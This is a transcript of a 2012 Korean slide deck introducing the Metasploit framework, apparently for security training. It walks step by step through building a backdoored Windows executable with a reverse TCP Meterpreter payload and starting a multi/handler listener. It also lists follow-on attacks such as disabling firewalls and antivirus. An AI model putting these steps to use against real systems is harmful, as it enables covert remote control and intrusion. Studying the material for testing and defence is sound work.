Matasploit의 소개와 사용법

Download Report

Transcript Matasploit의 소개와 사용법

Matasploit의 소개와 사용
• 2012. 7. 2
목차
I.
Matasploit 소개
II. 주요기능
III. 주요공격 Demo
IV. 토론 및 시사점
별첨. VIRUS Total 탐지여부 확인
I. Metaspoit 이란?
• History
- 2003년 여름 HD Moore 가 코드연구 및 개발등에서 악용될 취약점을 공개할 목적으로
Metasploit 프로젝트를 시작했으며, 현재도 Rapid7에서 최고보안책임자로써 활동하고 있고
그는 2008년 세계 보안분야의 영향력 있는 인물 15인 안에 선정된 바 있음.
- Metaspoit은 관련 도구등 을 활용하여 취약점 점검에 편리하도록 익스플로잇을 모아놓은 오픈소스
프레임워크로, 취약점에 대한 깊이 있는 지식이 없어도 간단하고 쉽게 취약점 점검가능
※ HD Moore 사진
※ 홈페이지 : http://www.metasploit.com
II. Matasploit 주요 기능
• 기능
- 침투테스트
- 웹 캠, 마이크 활용한 도청등의 해킹
- 취약성점검 (Nessus, 오라클, 어도비 플래쉬 및 각종 프로토콜 등
- 백도어
• 지원OS
- Windows, Unix, Linux
※ V4.0.0 기준 explits 등이 작년 8월 1일 업데이트 확인
III. 타겟시스템 모듈 생성
1.
2.
3.
사용법
① 모듈 로드
- 공격에 필요한 모듈 로드
② PAYLOAD
- 공격 후 취할 행동 결정
③ 위 PAYLOAD 상세 타입 결정
④ 모듈 생성 완료
상세 안내
• Backtrack5를 Vmware상에서 실행
• /pentest/exploits/SET/set 프로그램 실행
- 메뉴 중 4번 Create a 4Payload and Listener 선택
- 메뉴 2번 Windows Reverse TCP Meterpreter 선택
- 메뉴 16번 Backdoored Executable (BEST) 선택
- listener port = Random(enter for default) 적용
- start the listener now? Yes or no “NO” 선택
 msf.exe 파일 생성
…
4.
특징
- 리버싱 shell 코드는 방화벽 우회 가능
- metasploit 을 통하여 간단히 생성 가능
리스너 (console)실행
• use exploit/multi/handler – 공격할 exploit 설정
• set PAYLOAD windwos/meterpreter/reverse_tcp – 어떤 코드 실행할지 설정
• set lhost , set lport 후 exploit
중략
VI. 주요 공격 및 시사점
• 주요공격
- 원격에서 타겟시스템의 계정생성
- 원도우 보안설정(방화벽, 백신) 기능 해제
- 타겟 시스템의 프로그램 임의 실행
• 시사점
- 해당 공격에 대한 모니터링이 가능한가?
- 초기 타겟 시스템에 쉘 코드는 어떠한 방법들로 실행 시킬수 있는가?
별첨. 바이러스 토탈 (www.virustotal.com) 정보
1. 파일정보
2. MD5 정보
별첨. Doolgi (http://112.169.19.236/) 정보
1. 파일정보
감사합니다.